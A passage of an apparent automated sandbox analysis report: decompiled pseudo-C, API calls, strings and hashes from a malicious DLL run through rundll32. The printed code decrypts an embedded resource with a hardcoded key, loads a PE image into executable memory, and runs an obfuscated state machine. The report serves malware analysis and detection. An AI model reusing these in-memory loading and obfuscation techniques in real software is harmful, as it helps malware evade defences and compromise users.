						_v44 = _t95;
					}
					_t47 =  &_v40; // 0x6e
					_v48 = E100048E0(_t47);
					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
					_t133 =  *0x10055a78;
					if( *0x10055a78 == 0) {
						__eflags = 0x2000;
						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
					} else {
						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
						_v12 = _t93;
					}
					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
					_t104 =  *0x100530b4; // 0x2795
					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
					_t109 = _v16;
					E10003EE0(_v16, _v12, _v52);
					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
					 *0x10055a8c = _t92;
					_t72 = 1;
				}
				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
			}

0x100125c0
0x100125c0
0x100125c0
0x100125c6
0x100125cd
0x100125d3
0x100125d9
0x100125df
0x100125e2
0x100125eb
0x100125f0
0x100125f7
0x100125fe
0x10012605
0x1001260c
0x10012613
0x10012618
0x1001261a
0x1001265a
0x1001265f
0x10012667
0x1001261c
0x1001261c
0x10012626
0x10012630
0x1001263a
0x10012644
0x1001264e
0x1001266e
0x10012675
0x1001268a
0x10012690
0x100126a1
0x100126b2
0x100126b5
0x100126bb
0x100126c1
0x100126c7
0x100126cd
0x100126d3
0x100126d9
0x100126df
0x100126e5
0x100126eb
0x100126f1
0x100126f7
0x100126fd
0x10012703
0x10012709
0x1001270f
0x10012715
0x1001271b
0x10012721
0x10012727
0x1001272d
0x10012733
0x10012739
0x1001273f
0x10012746
0x10012748
0x1001274c
0x10012751
0x10012754
0x10012754
0x10012757
0x10012763
0x10012777
0x1001278d
0x10012792
0x10012799
0x100127c4
0x100127d7
0x1001279b
0x100127ac
0x100127b2
0x100127b2
0x100127e6
0x100127ee
0x100127fd
0x1001280b
0x1001281b
0x1001281f
0x10012834
0x10012839
0x1001283e
0x1001283e
0x10012850

APIs

Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C

_printf.LIBCMT ref: 1001265F
FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
_malloc.LIBCMT ref: 100127F5

Strings

DASHBOARD, xrefs: 1001267C
l, xrefs: 100126F7
l, xrefs: 10012733
l, xrefs: 1001271B
l, xrefs: 100126D3
., xrefs: 100126E5
l, xrefs: 1001272D
e, xrefs: 100126CD
d, xrefs: 10012727
ndldl, xrefs: 10012757, 1001275A
2, xrefs: 100126DF
6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0, xrefs: 10012802
n, xrefs: 100126C7
d, xrefs: 100126EB
l, xrefs: 10012715
., xrefs: 10012721
l, xrefs: 100126F1
kre3.l, xrefs: 10012748, 1001274B
3, xrefs: 100126D9

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
API String ID: 572389289-2839844625
Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001990(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0xfffefe57
						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0xfffefe57
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_t59 = _v64 - 1; // 0x71
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001810(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0xfffefe57
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
															}
															if(E10001FF0(_v100, _v72) != 0) {
																_t202 = E10001CB0(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10001E30(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10055a88; // 0x0
																		_t278 =  *0x10055a84; // 0x1
																		_t326 =  *0x10055a80; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002840(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

0x10002286
0x10002289
0x10002290
0x100022a7
0x100022b3
0x100022c1
0x100022d8
0x100022f0
0x100022ff
0x10002302
0x1000230e
0x1000232f
0x1000234c
0x1000236e
0x10002377
0x1000237a
0x10002395
0x100023a8
0x100023c4
0x100023aa
0x100023b3
0x100023b3
0x100023cd
0x100023d2
0x100023d2
0x10002389
0x10002392
0x10002392
0x100023db
0x100023ea
0x100023f8
0x10002401
0x10002412
0x10002438
0x1000243e
0x10002445
0x10002472
0x10002483
0x1000248a
0x100024b2
0x100024c4
0x100024cb
0x100024d4
0x100024dd
0x100024e6
0x100024ef
0x100024f8
0x10002510
0x1000252e
0x10002534
0x10002546
0x10002554
0x1000255a
0x10002564
0x1000257a
0x10002581
0x10002598
0x1000259b
0x1000259e
0x100025bb
0x100025a0
0x100025b3
0x100025b3
0x100025d0
0x100025e3
0x100025ea
0x10002604
0x10002616
0x10002680
0x10002687
0x00000000
0x10002687
0x1000261f
0x10002678
0x1000267b
0x00000000
0x1000267b
0x1000262c
0x1000262f
0x10002635
0x1000263c
0x10002646
0x1000264d
0x10002661
0x00000000
0x10002661
0x10002654
0x1000268c
0x10002693
0x00000000
0x10002698
0x00000000
0x10002606
0x00000000
0x100025ec
0x00000000
0x100025d2
0x00000000
0x10002583
0x00000000
0x10002512
0x10002497
0x1000249f
0x00000000
0x100024a5
0x10002454
0x1000245a
0x10002461
0x00000000
0x00000000
0x10002465
0x00000000
0x1000246b
0x10002419
0x00000000
0x1000241f
0x10002353
0x00000000
0x10002359
0x10002336
0x00000000
0x1000233c
0x10002315
0x00000000
0x1000231b
0x00000000
0x100022f2
0x100022c8
0x00000000
0x100022ce
0x00000000

APIs

Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1

SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0034F8FD Relevance: 11.6, Strings: 9, Instructions: 353
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0034F8FD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed short* _t368;
				signed int _t381;
				signed int* _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t405;
				signed int* _t438;
				void* _t439;
				signed short* _t445;
				signed int* _t446;

				_t446 =  &_v1700;
				_v1636 = 0x636551;
				_t2 =  &_v1636; // 0x636551
				_t385 = 0x5e;
				_v1636 =  *_t2 / _t385;
				_t383 = 0;
				_t386 = 0x7a;
				_t439 = 0x12dab9f;
				_v1636 = _v1636 * 0x55;
				_v1636 = _v1636 ^ 0x0059e0ec;
				_v1616 = 0x84ec4b;
				_v1616 = _v1616 + 0xffff958e;
				_v1616 = _v1616 << 6;
				_v1616 = _v1616 ^ 0x212f9cfc;
				_v1624 = 0x57c2af;
				_v1624 = _v1624 / _t386;
				_v1624 = _v1624 >> 0xa;
				_v1624 = _v1624 ^ 0x000a9340;
				_v1676 = 0x94d6a3;
				_v1676 = _v1676 >> 3;
				_t387 = 0x41;
				_v1676 = _v1676 * 0x79;
				_v1676 = _v1676 * 0x68;
				_v1676 = _v1676 ^ 0x9280c2f7;
				_v1644 = 0x578290;
				_v1644 = _v1644 | 0x80e552f7;
				_v1644 = _v1644 + 0xffffd80b;
				_v1644 = _v1644 ^ 0x80feae5e;
				_v1652 = 0x70c956;
				_v1652 = _v1652 ^ 0x31ba76f8;
				_v1652 = _v1652 ^ 0x87f2510e;
				_v1652 = _v1652 ^ 0xb63594c0;
				_v1696 = 0x39dcdb;
				_v1696 = _v1696 * 0x22;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 * 0x75;
				_v1696 = _v1696 ^ 0x000247c6;
				_v1572 = 0x793846;
				_v1572 = _v1572 + 0xfc60;
				_v1572 = _v1572 ^ 0x007fa213;
				_v1576 = 0x3629f6;
				_v1576 = _v1576 | 0x7f6cc17b;
				_v1576 = _v1576 ^ 0x7f7c74a2;
				_v1600 = 0x630dc0;
				_v1600 = _v1600 | 0x8a3170d6;
				_v1600 = _v1600 ^ 0x8a7fe201;
				_v1664 = 0xe79625;
				_v1664 = _v1664 * 0x57;
				_v1664 = _v1664 ^ 0xe47ae09a;
				_v1664 = _v1664 + 0xffff598f;
				_v1664 = _v1664 ^ 0xaac0e7d1;
				_v1648 = 0xac147c;
				_v1648 = _v1648 << 4;
				_v1648 = _v1648 / _t387;
				_v1648 = _v1648 ^ 0x00264750;
				_v1588 = 0x745952;
				_t98 =  &_v1588; // 0x745952
				_v1588 =  *_t98 * 0x3a;
				_v1588 = _v1588 ^ 0x1a53f4d8;
				_v1672 = 0x57a21b;
				_t388 = 0x49;
				_v1672 = _v1672 / _t388;
				_t389 = 0x63;
				_v1672 = _v1672 / _t389;
				_v1672 = _v1672 | 0xd6f4ed27;
				_v1672 = _v1672 ^ 0xd6feee0f;
				_v1620 = 0xc904e8;
				_t390 = 0x17;
				_v1620 = _v1620 * 0x6d;
				_v1620 = _v1620 + 0x178d;
				_v1620 = _v1620 ^ 0x5592dda0;
				_v1688 = 0x59d198;
				_v1688 = _v1688 | 0x5938a823;
				_v1688 = _v1688 ^ 0x788d0eee;
				_v1688 = _v1688 + 0xffff1978;
				_v1688 = _v1688 ^ 0x21fe2fab;
				_v1612 = 0xa097a2;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 / _t390;
				_v1612 = _v1612 ^ 0x02dc2d90;
				_v1700 = 0xb7b4a0;
				_t391 = 0x36;
				_v1700 = _v1700 / _t391;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 | 0xee164e4b;
				_v1700 = _v1700 ^ 0xee1e6de5;
				_v1680 = 0xe4ad14;
				_v1680 = _v1680 | 0xe839ddc8;
				_v1680 = _v1680 ^ 0xfe881b96;
				_t392 = 0x42;
				_v1680 = _v1680 * 0x4e;
				_v1680 = _v1680 ^ 0xd7ed2c6e;
				_v1656 = 0xa710a4;
				_v1656 = _v1656 + 0xfffff8f1;
				_v1656 = _v1656 ^ 0xcc5b21c1;
				_v1656 = _v1656 ^ 0xccf98fb8;
				_v1628 = 0x5fc40d;
				_v1628 = _v1628 + 0xb682;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x181c8c04;
				_v1640 = 0xd7aa78;
				_v1640 = _v1640 + 0x8e1d;
				_v1640 = _v1640 / _t392;
				_v1640 = _v1640 ^ 0x0007a72a;
				_v1580 = 0xbf48f6;
				_t393 = 0x25;
				_v1580 = _v1580 * 0xd;
				_v1580 = _v1580 ^ 0x09b7b49e;
				_v1564 = 0xff195;
				_v1564 = _v1564 + 0x8c1b;
				_v1564 = _v1564 ^ 0x00104e06;
				_v1684 = 0xbf1e83;
				_v1684 = _v1684 / _t393;
				_t394 = 0x77;
				_v1684 = _v1684 / _t394;
				_v1684 = _v1684 + 0xa662;
				_v1684 = _v1684 ^ 0x0006fc0d;
				_v1596 = 0xc39bae;
				_v1596 = _v1596 << 2;
				_v1596 = _v1596 ^ 0x030cfbaf;
				_v1568 = 0x66568e;
				_v1568 = _v1568 | 0x44ac0d6e;
				_v1568 = _v1568 ^ 0x44e9cf2b;
				_v1692 = 0x3d2b27;
				_v1692 = _v1692 + 0x3fae;
				_t395 = 0x71;
				_v1692 = _v1692 / _t395;
				_v1692 = _v1692 + 0xffff1a11;
				_v1692 = _v1692 ^ 0xffffbf57;
				_v1632 = 0xb4dfda;
				_v1632 = _v1632 * 9;
				_v1632 = _v1632 >> 3;
				_v1632 = _v1632 ^ 0x00c4553b;
				_v1584 = 0x206e7a;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x10371375;
				_v1592 = 0x689459;
				_v1592 = _v1592 + 0xffffb773;
				_v1592 = _v1592 ^ 0x00637077;
				_v1660 = 0x8b14df;
				_v1660 = _v1660 << 0xd;
				_v1660 = _v1660 + 0x9803;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x71eeeb6f;
				_v1608 = 0x8e767e;
				_v1608 = _v1608 | 0xfaf7fbb6;
				_v1608 = _v1608 ^ 0xfaf9bdf5;
				_v1668 = 0xccd677;
				_v1668 = _v1668 * 0x78;
				_v1668 = _v1668 + 0xffff6b3d;
				_v1668 = _v1668 + 0xf0ff;
				_v1668 = _v1668 ^ 0x600a3b9e;
				_v1604 = 0x7c05f9;
				_v1604 = _v1604 + 0xd55a;
				_v1604 = _v1604 ^ 0x007aedaa;
				_t445 = _v1604;
				while(_t439 != 0x12dab9f) {
					if(_t439 == 0x2f8e73a) {
						_push(_v1604);
						_push(_t383);
						_push(_t395);
						_push(_t383);
						_push(_t383);
						_push(_v1668);
						_push(_t445);
						E0034AB87(_v1660, _v1608, __eflags);
						_t383 = 1;
						__eflags = 1;
						L23:
						return _t383;
					}
					if(_t439 == 0x92208ae) {
						_t368 = _t445;
						__eflags =  *_t445 - _t383;
						if(__eflags == 0) {
							L18:
							_t439 = 0xeef82b0;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t368 - 0x2c;
							if( *_t368 != 0x2c) {
								goto L17;
							}
							_t438 =  &_v1560;
							while(1) {
								_t368 =  &(_t368[1]);
								_t405 =  *_t368 & 0x0000ffff;
								__eflags = _t405;
								if(_t405 == 0) {
									break;
								}
								__eflags = _t405 - 0x20;
								if(_t405 == 0x20) {
									break;
								}
								 *_t438 = _t405;
								_t438 =  &(_t438[0]);
								__eflags = _t438;
							}
							_t395 = 0;
							__eflags = 0;
							 *_t438 = 0;
							L17:
							_t368 =  &(_t368[1]);
							__eflags =  *_t368 - _t383;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t439 == 0x99a67ee) {
						_t445 = E0034F899(_t395);
						_t439 = 0x92208ae;
						continue;
					}
					if(_t439 == 0x9e65a83) {
						_push(_v1612);
						_push(_v1636);
						_push(_v1688);
						_push( &_v520); // executed
						E003546BB(_v1672, _v1620); // executed
						E0035DA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
						_push(_v1564);
						_push(_v1580);
						E003447CE( &_v520, _v1684, _v1640, _v1596, _v1568, E0035DCF7(_v1640, 0x341140, __eflags),  &_v1040, _v1692, _v1632);
						_t395 = _v1584;
						E0034A8B0(_t395, _t375, _v1592);
						_t446 = _t446 - 0xc + 0x58;
						_t439 = 0x2f8e73a;
						continue;
					}
					_t457 = _t439 - 0xeef82b0;
					if(_t439 == 0xeef82b0) {
						_push(_v1696);
						_push(_v1652);
						_t381 = E0034B23C(_v1572, _v1576, E0035DCF7(_v1644, 0x3410c0, _t457), _v1600, _v1664,  &_v1560); // executed
						_t395 = _v1648;
						asm("sbb edi, edi");
						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
						E0034A8B0(_t395, _t379, _v1588);
						_t446 =  &(_t446[7]);
					}
					L20:
					if(_t439 != 0xdf158d7) {
						continue;
					}
					goto L23;
				}
				E00344B61( &_v1560, 0x208, _v1616, _v1624);
				_pop(_t395);
				_t439 = 0x99a67ee;
				goto L20;
			}

0x0034f8fd
0x0034f903
0x0034f90d
0x0034f917
0x0034f91c
0x0034f927
0x0034f929
0x0034f92c
0x0034f931
0x0034f935
0x0034f93d
0x0034f945
0x0034f94d
0x0034f952
0x0034f95a
0x0034f96a
0x0034f96e
0x0034f973
0x0034f97b
0x0034f983
0x0034f98d
0x0034f98e
0x0034f997
0x0034f99b
0x0034f9a3
0x0034f9ab
0x0034f9b3
0x0034f9bb
0x0034f9c3
0x0034f9cb
0x0034f9d3
0x0034f9db
0x0034f9e3
0x0034f9f0
0x0034f9f4
0x0034f9fe
0x0034fa02
0x0034fa0a
0x0034fa15
0x0034fa20
0x0034fa2b
0x0034fa36
0x0034fa41
0x0034fa4c
0x0034fa54
0x0034fa5c
0x0034fa64
0x0034fa71
0x0034fa75
0x0034fa7d
0x0034fa85
0x0034fa8d
0x0034fa95
0x0034faa0
0x0034faa4
0x0034faac
0x0034fab7
0x0034fabf
0x0034fac6
0x0034fad1
0x0034fae1
0x0034fae6
0x0034faf0
0x0034faf5
0x0034fafb
0x0034fb03
0x0034fb0b
0x0034fb18
0x0034fb1b
0x0034fb1f
0x0034fb27
0x0034fb2f
0x0034fb37
0x0034fb3f
0x0034fb47
0x0034fb4f
0x0034fb57
0x0034fb5f
0x0034fb6c
0x0034fb70
0x0034fb78
0x0034fb84
0x0034fb89
0x0034fb8f
0x0034fb93
0x0034fb9b
0x0034fba3
0x0034fbab
0x0034fbb3
0x0034fbc0
0x0034fbc3
0x0034fbc7
0x0034fbcf
0x0034fbd7
0x0034fbdf
0x0034fbe7
0x0034fbef
0x0034fbf7
0x0034fbff
0x0034fc04
0x0034fc0c
0x0034fc14
0x0034fc24
0x0034fc28
0x0034fc30
0x0034fc43
0x0034fc44
0x0034fc4b
0x0034fc56
0x0034fc61
0x0034fc6c
0x0034fc77
0x0034fc87
0x0034fc91
0x0034fc96
0x0034fc9c
0x0034fca4
0x0034fcac
0x0034fcb4
0x0034fcb9
0x0034fcc1
0x0034fccc
0x0034fcd7
0x0034fce2
0x0034fcea
0x0034fcf6
0x0034fcf9
0x0034fcfd
0x0034fd05
0x0034fd0d
0x0034fd1a
0x0034fd1e
0x0034fd23
0x0034fd2b
0x0034fd36
0x0034fd3e
0x0034fd49
0x0034fd51
0x0034fd59
0x0034fd61
0x0034fd69
0x0034fd6e
0x0034fd76
0x0034fd7b
0x0034fd83
0x0034fd8b
0x0034fd93
0x0034fd9b
0x0034fda8
0x0034fdac
0x0034fdb4
0x0034fdbc
0x0034fdc4
0x0034fdcc
0x0034fdd4
0x0034fddc
0x0034fde0
0x0034fdf2
0x0034ffd1
0x0034ffd5
0x0034ffd6
0x0034ffd7
0x0034ffd8
0x0034ffd9
0x0034ffe8
0x0034ffe9
0x0034fff3
0x0034fff3
0x0034fff7
0x00350000
0x00350000
0x0034fdfe
0x0034ff5e
0x0034ff60
0x0034ff64
0x0034ff99
0x0034ff99
0x00000000
0x00000000
0x00000000
0x00000000
0x0034ff66
0x0034ff66
0x0034ff66
0x0034ff6a
0x00000000
0x00000000
0x0034ff6c
0x0034ff81
0x0034ff81
0x0034ff84
0x0034ff87
0x0034ff8a
0x00000000
0x00000000
0x0034ff75
0x0034ff79
0x00000000
0x00000000
0x0034ff7b
0x0034ff7e
0x0034ff7e
0x0034ff7e
0x0034ff8c
0x0034ff8c
0x0034ff8e
0x0034ff91
0x0034ff91
0x0034ff94
0x0034ff94
0x00000000
0x0034ff66
0x0034fe0a
0x0034ff52
0x0034ff54
0x00000000
0x0034ff54
0x0034fe16
0x0034fe8f
0x0034fe9a
0x0034fe9e
0x0034fead
0x0034feae
0x0034fecf
0x0034fed4
0x0034fee0
0x0034ff22
0x0034ff2e
0x0034ff37
0x0034ff3c
0x0034ff3f
0x00000000
0x0034ff3f
0x0034fe18
0x0034fe1e
0x0034fe24
0x0034fe2d
0x0034fe5e
0x0034fe6a
0x0034fe74
0x0034fe7c
0x0034fe82
0x0034fe87
0x0034fe87
0x0034ffc3
0x0034ffc9
0x00000000
0x00000000
0x00000000
0x0034ffcf
0x0034ffb7
0x0034ffbd
0x0034ffbe
0x00000000

Strings

'+=, xrefs: 0034FCE2
zn , xrefs: 0034FD2B
Y, xrefs: 0034F935
Qec, xrefs: 0034F90D
RYt, xrefs: 0034FAB7
wpc, xrefs: 0034FD59
F8y, xrefs: 0034FA0A
PG&, xrefs: 0034FAA4
oq, xrefs: 0034FD7B

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
API String ID: 1514166925-3316477785
Opcode ID: bb669bcba54fdd73a7c326e707dd7906c15cd92759e2674a8831996c266b215f
Instruction ID: 75c2ba723f5952a0de52e1ce9e2a920d2b22ab13c67c917813e1f36ce7818543
Opcode Fuzzy Hash: bb669bcba54fdd73a7c326e707dd7906c15cd92759e2674a8831996c266b215f
Instruction Fuzzy Hash: AC021F725083818FD369CF25C58AA1BBBE2FBC5718F108A1DF1998A260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0034E991 Relevance: 2.6, Strings: 2, Instructions: 68
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, char _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_v32 = _v32 & 0x00000000;
				_v44 = 0xa88528;
				_v40 = 0x811176;
				_v36 = 0xed2c64;
				_v20 = 0x893932;
				_v20 = _v20 ^ 0x2faf083b;
				_v20 = _v20 ^ 0x2f2d1c53;
				_v8 = 0xbe2d1;
				_t85 = 0x2e;
				_v8 = _v8 / _t85;
				_v8 = _v8 >> 0xd;
